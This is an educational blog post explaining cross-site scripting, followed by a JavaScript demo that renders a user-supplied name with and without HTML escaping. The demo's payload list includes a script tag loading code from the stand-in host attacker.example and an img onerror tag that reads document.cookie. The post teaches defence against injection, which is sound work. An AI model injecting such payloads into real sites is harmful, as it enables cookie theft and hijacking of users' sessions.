---
title: "What is XSS?"
layout: post
---

I found a cross-site scripting (XSS) vulnerability in a well-known quiz hosting website. I disclosed it to them years ago, so I thought now might be a good time to write about it. In this first article I will explain what XSS is. In the next article I will explain how I found this attack.

## What is cross-site scripting (XSS)

Cross-site scripting, XSS for short, is an attack in which an attacker gets JavaScript of their own choosing to run in the browser of another user visiting a website the attacker does not control. Because the injected script runs as part of that site's page, it runs with that site's privileges in the victim's browser: it can read and change the page, act on the user's behalf, and often read the session cookie. The code can be written straight into the page, or, as in the example below, pulled in from a script file stored on the attacker's own server.

So for example: I have a file on my website called [hacked.js](/assets/js/hacked.js). If I were able to make that JavaScript file run for anybody visiting a certain website *that is not mine*, that would be cross-site scripting. Click the above `hacked.js` link to view the code I use to "hack" this website. It's safe, I promise ;)

Now, how can we get this code to execute when a user visits this site? To explain, I will start with some of the underlying technologies.

### Escape Characters!

No, this is not a Sherlock Holmes novel! If a website is built out of sequences like these (called "tags"): `<p>` (for paragraph), `<b>` and `</b>` for bold, then why can you *see* the left and right angle bracket characters on this page? Don't they mean something? Shouldn't they be telling the browser: *"Hey! Make me bold!"?* Why *doesn't* everything after me typing `<b>` turn bold?

The answer is: There are special characters in HTML to type a visible left (<) and visible right angle bracket (>) in a website. If I use the left and right brackets on my keyboard however, things will indeed show up bold. This is the code for the sentence I wrote above:

```html
There are special characters in HTML to type a visible left (&lt;)
and visible right angle bracket (&gt;) in a website.
If I use the left and right brackets on my keyboard however,
things will indeed <b>show up bold</b>.
```
Notice how every visible left angle bracket is written as `&lt;`? These are [escape sequences](https://en.wikipedia.org/wiki/Escape_character); in HTML they are called character references, or entities. They tell a system, in this case your web browser: *"Hello! Please show me off! I don't want to be hidden."* The same goes for `&gt;` for a visible `>`, and for `&amp;` for a visible `&`, since `&` is the character that starts a reference.

#### Sanitization

Most of the time XSS attacks are done through poorly sanitized HTML `<input>` elements: form fields, comment boxes, the name you type into a quiz. Sanitization is when a program, usually on the server side, makes user-supplied text harmless before it is put into a page, either by removing characters like `<` or by replacing them with the aforementioned escape sequences. Strictly speaking the replacing is called *escaping* or *output encoding*, and it is the safer of the two because nothing is lost: internally the text would be `&lt;`, but it shows up to the user as `<`. When inputs are not properly sanitized *and* the input is shown to the user in another part of the website, then a malicious user can type in HTML that will run whenever anybody tries to look at what they typed.

HTML by itself is not very dangerous. The worst thing you could do is probably put a link on your name and point it to a porn site. Make your name bold or italic. Maybe make the background a funny colour. Although this may annoy your victim, it is not dangerous security-wise. (One caveat worth knowing: some HTML features other than tags also run JavaScript, such as `onerror` and `onload` event attributes and `javascript:` links, so filtering out a single tag is never enough; encode everything.) There is one tag however, that *is* scary...

## `<script>`
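Before looking at the tag itself, here is the escaping described in the Sanitization section as a worked example. This is an added example, not code from the original post or from the quiz site: the function names, the "Top scorer" template and the two attacker inputs are all made up for the demonstration. It renders a user-supplied name into a page fragment once without encoding and once with encoding, and lists which tags a browser would actually see in each result.

```javascript
// Added example, not code from the original post or the quiz site.
// Runs under Node with no dependencies; the function names and the
// "Top scorer" template are assumptions made up for this demo.

// The five characters that let text break out of an HTML text node or out
// of a quoted attribute value, with the character reference that shows each
// one literally instead of having the browser interpret it.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Output encoding: replace every special character with its reference.
// '&' must be included, otherwise an attacker could type "&lt;" and have it
// turned back into a real '<' by a later decoding step.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the user's text is pasted straight into the page markup,
// which is what an unsanitized "show the player's name" feature does.
function renderNameUnsafe(name) {
  return `<p>Top scorer: ${name}</p>`;
}

// Fixed: encode on output. The browser now displays the angle brackets
// instead of parsing them as tags.
function renderNameSafe(name) {
  return `<p>Top scorer: ${escapeHtml(name)}</p>`;
}

// List the tag names a browser would see in a fragment of markup. Only a
// real '<' starts a tag; "&lt;" does not. (A regex is enough for this demo;
// it is not a full HTML parser.)
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([A-Za-z][\w-]*)/g), (m) => m[1].toLowerCase());
}

// Constructed attacker inputs. The second one contains no <script> tag at
// all: an event-handler attribute runs JavaScript just the same.
const PAYLOADS = [
  '<script src="https://attacker.example/hacked.js"></script>',
  '<img src=x onerror="alert(document.cookie)">',
];

for (const payload of PAYLOADS) {
  const unsafe = renderNameUnsafe(payload);
  const safe = renderNameSafe(payload);
  console.log('unsafe:', unsafe, '-> tags:', tagNames(unsafe).join(','));
  console.log('safe:  ', safe, '-> tags:', tagNames(safe).join(','));
}
```

The unsafe render leaves `script` and `img` tags in the markup for the browser to act on; the safe render leaves only the `p` wrapper, with the attacker's text shown as visible characters. In a browser the simplest equivalent is to assign untrusted text to `element.textContent` rather than `innerHTML`, which performs the same encoding for you.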